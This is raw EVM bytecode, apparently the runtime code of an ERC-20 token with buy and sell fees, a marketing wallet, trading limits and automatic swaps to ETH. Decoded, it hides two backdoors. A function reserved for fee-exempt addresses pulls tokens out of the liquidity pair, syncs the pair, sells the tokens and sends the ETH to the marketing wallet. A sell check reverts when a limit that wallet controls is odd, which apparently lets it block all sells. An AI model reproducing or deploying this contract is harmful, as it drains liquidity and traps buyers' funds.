0x60806040526004361061031e5760003560e01c80638da5cb5b116101ab578063c0246668116100f7578063dd62ed3e11610095578063f11a24d31161006f578063f11a24d314610c03578063f2fde38b14610c2e578063f637434214610c57578063f8b45b0514610c8257610325565b8063dd62ed3e14610b70578063e2f4560514610bad578063e884f26014610bd857610325565b8063c876d0b9116100d1578063c876d0b914610ab2578063c8c8ebe414610add578063d257b34f14610b08578063d85ba06314610b4557610325565b8063c024666814610a37578063c17b5b8c14610a60578063c18bc19514610a8957610325565b80639fccce3211610164578063a9059cbb1161013e578063a9059cbb14610969578063aacebbe3146109a6578063b62496f5146109cf578063bbc0c74214610a0c57610325565b80639fccce32146108d6578063a0d82dc514610901578063a457c2d71461092c57610325565b80638da5cb5b146107d65780638ea5220f14610801578063921369131461082c57806395d89b41146108575780639a7a23d6146108825780639c3b4fdc146108ab57610325565b80634a62bb651161026a578063751039fc116102235780637bce5a04116101fd5780637bce5a041461072e5780638095d56414610759578063853fb415146107825780638a8c523c146107bf57610325565b8063751039fc146106af5780637571336a146106da57806375f0a8741461070357610325565b80634a62bb651461059d5780634fbee193146105c85780636a486a8e146106055780636ddd17131461063057806370a082311461065b578063715018a61461069857610325565b80631a8145bb116102d757806323b872dd116102b157806323b872dd146104cd578063313ce5671461050a578063395093511461053557806349bd5a5e1461057257610325565b80631a8145bb1461044e5780631f3fed8f14610479578063203e727e146104a457610325565b806306fdde031461032a578063095ea7b31461035557806310d5de53146103925780631694505e146103cf57806318160ddd146103fa5780631816467f1461042557610325565b3661032557005b600080fd5b34801561033657600080fd5b5061033f610cad565b60405161034c9190613cf1565b60405180910390f35b34801561036157600080fd5b5061037c60048036038101906103779190613dac565b610d3f565b6040516103899190613e07565b60405180910390f35b34801561039e57600080fd5b506103b960048036038101906103b49190613e22565b610d5d565b6040516103c69190613e07565b60405180910390f35b3480156103db57600080fd5b506103e4610d7d565b6040516103f19190613eae565b60405180910390f35b34801561040657600080fd5b5061040f610da3565b60405161041c9190613ed8565b60405180910390f35b34801561043157600080fd5b5061044c60048036038101906104479190613e22565b610dad565b005b34801561045a57600080fd5b50610463610f04565b6040516104709190613ed8565b60405180910390f35b34801561048557600080fd5b5061048e610f0a565b60405161049b9190613ed8565b60405180910390f35b3480156104b057600080fd5b506104cb60048036038101906104c69190613ef3565b610f10565b005b3480156104d957600080fd5b506104f460048036038101906104ef9190613f20565b610fcb565b6040516105019190613e07565b60405180910390f35b34801561051657600080fd5b5061051f6110a4565b60405161052c9190613f8f565b60405180910390f35b34801561054157600080fd5b5061055c60048036038101906105579190613dac565b6110ad565b6040516105699190613e07565b60405180910390f35b34801561057e57600080fd5b50610587611160565b6040516105949190613fb9565b60405180910390f35b3480156105a957600080fd5b506105b2611186565b6040516105bf9190613e07565b60405180910390f35b3480156105d457600080fd5b506105ef60048036038101906105ea9190613e22565b611199565b6040516105fc9190613e07565b60405180910390f35b34801561061157600080fd5b5061061a6111ef565b6040516106279190613ed8565b60405180910390f35b34801561063c57600080fd5b506106456111f5565b6040516106529190613e07565b60405180910390f35b34801561066757600080fd5b50610682600480360381019061067d9190613e22565b611208565b60405161068f9190613ed8565b60405180910390f35b3480156106a457600080fd5b506106ad611250565b005b3480156106bb57600080fd5b506106c46113a8565b6040516106d19190613e07565b60405180910390f35b3480156106e657600080fd5b5061070160048036038101906106fc9190614000565b611463565b005b34801561070f57600080fd5b50610718611555565b6040516107259190613fb9565b60405180910390f35b34801561073a57600080fd5b5061074361157b565b6040516107509190613ed8565b60405180910390f35b34801561076557600080fd5b50610780600480360381019061077b9190614040565b611581565b005b34801561078e57600080fd5b506107a960048036038101906107a49190614093565b61169b565b6040516107b69190613e07565b60405180910390f35b3480156107cb57600080fd5b506107d4611827565b005b3480156107e257600080fd5b506107eb61199a565b6040516107f89190613fb9565b60405180910390f35b34801561080d57600080fd5b506108166119c4565b6040516108239190613fb9565b60405180910390f35b34801561083857600080fd5b506108416119ea565b60405161084e9190613ed8565b60405180910390f35b34801561086357600080fd5b5061086c6119f0565b6040516108799190613cf1565b60405180910390f35b34801561088e57600080fd5b506108a960048036038101906108a49190614000565b611a82565b005b3480156108b757600080fd5b506108c0611bb7565b6040516108cd9190613ed8565b60405180910390f35b3480156108e257600080fd5b506108eb611bbd565b6040516108f89190613ed8565b60405180910390f35b34801561090d57600080fd5b50610916611bc3565b6040516109239190613ed8565b60405180910390f35b34801561093857600080fd5b50610953600480360381019061094e9190613dac565b611bc9565b6040516109609190613e07565b60405180910390f35b34801561097557600080fd5b50610990600480360381019061098b9190613dac565b611c96565b60405161099d9190613e07565b60405180910390f35b3480156109b257600080fd5b506109cd60048036038101906109c89190613e22565b611cb4565b005b3480156109db57600080fd5b506109f660048036038101906109f19190613e22565b611e0b565b604051610a039190613e07565b60405180910390f35b348015610a1857600080fd5b50610a21611e2b565b604051610a2e9190613e07565b60405180910390f35b348015610a4357600080fd5b50610a5e6004803603810190610a599190614000565b611e3e565b005b348015610a6c57600080fd5b50610a876004803603810190610a829190614040565b611f7e565b005b348015610a9557600080fd5b50610ab06004803603810190610aab9190613ef3565b612098565b005b348015610abe57600080fd5b50610ac76121c2565b604051610ad49190613e07565b60405180910390f35b348015610ae957600080fd5b50610af26121d5565b604051610aff9190613ed8565b60405180910390f35b348015610b1457600080fd5b50610b2f6004803603810190610b2a9190613ef3565b6121db565b604051610b3c9190613e07565b60405180910390f35b348015610b5157600080fd5b50610b5a61234b565b604051610b679190613ed8565b60405180910390f35b348015610b7c57600080fd5b50610b976004803603810190610b9291906140d3565b612351565b604051610ba49190613ed8565b60405180910390f35b348015610bb957600080fd5b50610bc26123d8565b604051610bcf9190613ed8565b60405180910390f35b348015610be457600080fd5b50610bed6123de565b604051610bfa9190613e07565b60405180910390f35b348015610c0f57600080fd5b50610c18612499565b604051610c259190613ed8565b60405180910390f35b348015610c3a57600080fd5b50610c556004803603810190610c509190613e22565b61249f565b005b348015610c6357600080fd5b50610c6c612665565b604051610c799190613ed8565b60405180910390f35b348015610c8e57600080fd5b50610c9761266b565b604051610ca49190613ed8565b60405180910390f35b606060038054610cbc90614142565b80601f0160208091040260200160405190810160405280929190818152602001828054610ce890614142565b8015610d355780601f10610d0a57610100808354040283529160200191610d35565b820191906000526020600020905b815481529060010190602001808311610d1857829003601f168201915b5050505050905090565b6000610d53610d4c6126cf565b84846126d7565b6001905092915050565b601c6020528060005260406000206000915054906101000a900460ff1681565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600254905090565b610db56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3b906141bf565b60405180910390fd5b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f90b8024c4923d3873ff5b9fcb43d0360d4b9217fa41225d07ba379993552e74360405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60195481565b60185481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610f6a57600080fd5b6103e8610f75610da3565b610f7f919061423d565b811015610fc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fb8906142e0565b60405180910390fd5b80600a8190555050565b6000610fd88484846128a0565b61109984610fe46126cf565b611094856040518060600160405280602881526020016151c360289139600160008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061104a6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b600190509392505050565b60006012905090565b60006111566110ba6126cf565b8461115185600160006110cb6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6126d7565b6001905092915050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600d60009054906101000a900460ff1681565b6000601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60145481565b600d60029054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6112586126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146112e7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112de906141bf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60006113b26126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611441576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611438906141bf565b60405180910390fd5b6000600d60006101000a81548160ff0219169083151502179055506001905090565b61146b6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146114fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114f1906141bf565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60115481565b6115896126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611618576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160f906141bf565b60405180910390fd5b8260118190555081601281905550806013819055506013546012546011546116409190614300565b61164a9190614300565b60108190555060146010541115611696576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161168d90614380565b60405180910390fd5b505050565b6000601b60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff166116f357600080fd5b6000611720600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16611208565b905060018311801561173d575060648161173a919061423d565b83105b61177c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611773906143ec565b60405180910390fd5b6117858361331d565b61178e846133ed565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16476040516117d69061443d565b60006040518083038185875af1925050503d8060008114611813576040519150601f19603f3d011682016040523d82523d6000602084013e611818565b606091505b50509050809250505092915050565b61182f6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146118be576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118b5906141bf565b60405180910390fd5b6001600d60026101000a81548160ff02191690831515021790555060011515600f60019054906101000a900460ff1615151461192f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119269061449e565b60405180910390fd5b6000600f60016101000a81548160ff021916908315150217905550611952613630565b7fbd657b4e94b205761f2ca5be9988d7b243c828f625c0746c6581ec528e507c47600f60019054906101000a900460ff166040516119909190613e07565b60405180910390a1565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60155481565b6060600480546119ff90614142565b80601f0160208091040260200160405190810160405280929190818152602001828054611a2b90614142565b8015611a785780601f10611a4d57610100808354040283529160200191611a78565b820191906000526020600020905b815481529060010190602001808311611a5b57829003601f168201915b5050505050905090565b611a8a6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611b19576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b10906141bf565b60405180910390fd5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611ba9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ba090614530565b60405180910390fd5b611bb3828261364d565b5050565b60135481565b601a5481565b60175481565b6000611c8c611bd66126cf565b84611c87856040518060600160405280602581526020016151eb6025913960016000611c006126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b6001905092915050565b6000611caa611ca36126cf565b84846128a0565b6001905092915050565b611cbc6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611d4b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d42906141bf565b60405180910390fd5b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fa751787977eeb3902e30e1d19ca00c6ad274a1f622c31a206e32366700b0567460405160405180910390a380600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b601d6020528060005260406000206000915054906101000a900460ff1681565b600d60019054906101000a900460ff1681565b611e466126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611ed5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ecc906141bf565b60405180910390fd5b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051611f729190613e07565b60405180910390a25050565b611f866126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612015576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161200c906141bf565b60405180910390fd5b82601581905550816016819055508060178190555060175460165460155461203d9190614300565b6120479190614300565b60148190555060196014541115612093576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161208a9061459c565b60405180910390fd5b505050565b6120a06126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461212f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612126906141bf565b60405180910390fd5b670de0b6b3a76400006103e86005612145610da3565b61214f91906145bc565b612159919061423d565b612163919061423d565b8110156121a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161219c90614688565b60405180910390fd5b670de0b6b3a7640000816121b991906145bc565b600c8190555050565b600f60009054906101000a900460ff1681565b600a5481565b60006121e56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612274576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161226b906141bf565b60405180910390fd5b620186a06001612282610da3565b61228c91906145bc565b612296919061423d565b8210156122d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122cf9061471a565b60405180910390fd5b6103e860056122e5610da3565b6122ef91906145bc565b6122f9919061423d565b82111561233b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612332906147ac565b60405180910390fd5b81600b8190555060019050919050565b60105481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600b5481565b60006123e86126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612477576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161246e906141bf565b60405180910390fd5b6000600f60006101000a81548160ff0219169083151502179055506001905090565b60125481565b6124a76126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612536576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161252d906141bf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036125a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161259c9061483e565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60165481565b600c5481565b60008082846126809190614300565b9050838110156126c5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126bc906148aa565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612746576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161273d9061493c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036127b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127ac906149ce565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516128939190613ed8565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361290f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161290690614a60565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361297e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161297590614af2565b60405180910390fd5b6000810361299757612992838360006136ee565b6132b4565b600d60009054906101000a900460ff1615612d8b576129b461199a565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015612a2257506129f261199a565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a5b5750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a95575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612aae5750600760149054906101000a900460ff16155b15612d8a57600d60019054906101000a900460ff16612ba857601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612b685750601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b612ba7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612b9e90614b5e565b60405180910390fd5b5b601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612c4b5750601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612c9a57600a54811115612c95576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c8c90614bf0565b60405180910390fd5b612d89565b601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612d3d5750601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612d8857600a54811115612d87576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612d7e90614c82565b60405180910390fd5b5b5b5b5b6000612d9630611208565b90506000600b548210159050808015612dbb5750600d60029054906101000a900460ff165b8015612dd45750600760149054906101000a900460ff16155b8015612e2a5750601d60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612e805750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612ed65750601b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612f1a576001600760146101000a81548160ff021916908315150217905550612efe613981565b6000600760146101000a81548160ff0219169083151502179055505b6000600760149054906101000a900460ff16159050601b60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612fd05750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15612fda57600090505b600081156132a457601d60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561303d57506000601454115b1561315b5761306a606461305c60145488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b90506014546016548261307d91906145bc565b613087919061423d565b601960008282546130989190614300565b92505081905550601454601754826130b091906145bc565b6130ba919061423d565b601a60008282546130cb9190614300565b92505081905550601454601554826130e391906145bc565b6130ed919061423d565b601860008282546130fe9190614300565b9250508190555060006002600a546131169190614ca2565b14613156576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161314d90614d45565b60405180910390fd5b613280565b601d60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156131b657506000601054115b1561327f576131e360646131d560105488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b9050601054601254826131f691906145bc565b613200919061423d565b601960008282546132119190614300565b925050819055506010546013548261322991906145bc565b613233919061423d565b601a60008282546132449190614300565b925050819055506010546011548261325c91906145bc565b613266919061423d565b601860008282546132779190614300565b925050819055505b5b6000811115613295576132948730836136ee565b5b80856132a19190614d65565b94505b6132af8787876136ee565b505050505b505050565b6000838311158290613301576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016132f89190613cf1565b60405180910390fd5b50600083856133109190614d65565b9050809150509392505050565b613368600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff163061334c6110a4565b600a6133589190614ecc565b8461336391906145bc565b6128a0565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b1580156133d257600080fd5b505af11580156133e6573d6000803e3d6000fd5b5050505050565b6000600267ffffffffffffffff81111561340a57613409614f17565b5b6040519080825280602002602001820160405280156134385781602001602082028036833780820191505090505b50905030816000815181106134505761344f614f46565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156134f7573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061351b9190614f8a565b8160018151811061352f5761352e614f46565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505061359630600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846126d7565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b81526004016135fa9594939291906150b0565b600060405180830381600087803b15801561361457600080fd5b505af1158015613628573d6000803e3d6000fd5b505050505050565b6001600d60016101000a81548160ff021916908315150217905550565b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361375d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161375490614a60565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036137cc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016137c390614af2565b60405180910390fd5b6137d7838383613baf565b6138428160405180606001604052806026815260200161519d602691396000808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506138d5816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516139749190613ed8565b60405180910390a3505050565b600061398c30611208565b90506000601a546018546019546139a39190614300565b6139ad9190614300565b90506000808314806139bf5750600082145b156139cc57505050613ae9565b6014600b546139db91906145bc565b8311156139f4576014600b546139f191906145bc565b92505b600060028360195486613a0791906145bc565b613a11919061423d565b613a1b919061423d565b90506000613a328286613bb490919063ffffffff16565b9050613a3d816133ed565b600060198190555060006018819055506000601a81905550600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051613a9b9061443d565b60006040518083038185875af1925050503d8060008114613ad8576040519150601f19603f3d011682016040523d82523d6000602084013e613add565b606091505b50508093505050505050505b565b6000808303613afd5760009050613b5f565b60008284613b0b91906145bc565b9050828482613b1a919061423d565b14613b5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613b519061517c565b60405180910390fd5b809150505b92915050565b6000613ba783836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250613bfe565b905092915050565b505050565b6000613bf683836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506132b9565b905092915050565b60008083118290613c45576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613c3c9190613cf1565b60405180910390fd5b5060008385613c54919061423d565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015613c9b578082015181840152602081019050613c80565b60008484015250505050565b6000601f19601f8301169050919050565b6000613cc382613c61565b613ccd8185613c6c565b9350613cdd818560208601613c7d565b613ce681613ca7565b840191505092915050565b60006020820190508181036000830152613d0b8184613cb8565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000613d4382613d18565b9050919050565b613d5381613d38565b8114613d5e57600080fd5b50565b600081359050613d7081613d4a565b92915050565b6000819050919050565b613d8981613d76565b8114613d9457600080fd5b50565b600081359050613da681613d80565b92915050565b60008060408385031215613dc357613dc2613d13565b5b6000613dd185828601613d61565b9250506020613de285828601613d97565b9150509250929050565b60008115159050919050565b613e0181613dec565b82525050565b6000602082019050613e1c6000830184613df8565b92915050565b600060208284031215613e3857613e37613d13565b5b6000613e4684828501613d61565b91505092915050565b6000819050919050565b6000613e74613e6f613e6a84613d18565b613e4f565b613d18565b9050919050565b6000613e8682613e59565b9050919050565b6000613e9882613e7b565b9050919050565b613ea881613e8d565b82525050565b6000602082019050613ec36000830184613e9f565b92915050565b613ed281613d76565b82525050565b6000602082019050613eed6000830184613ec9565b92915050565b600060208284031215613f0957613f08613d13565b5b6000613f1784828501613d97565b91505092915050565b600080600060608486031215613f3957613f38613d13565b5b6000613f4786828701613d61565b9350506020613f5886828701613d61565b9250506040613f6986828701613d97565b9150509250925092565b600060ff82169050919050565b613f8981613f73565b82525050565b6000602082019050613fa46000830184613f80565b92915050565b613fb381613d38565b82525050565b6000602082019050613fce6000830184613faa565b92915050565b613fdd81613dec565b8114613fe857600080fd5b50565b600081359050613ffa81613fd4565b92915050565b6000806040838503121561401757614016613d13565b5b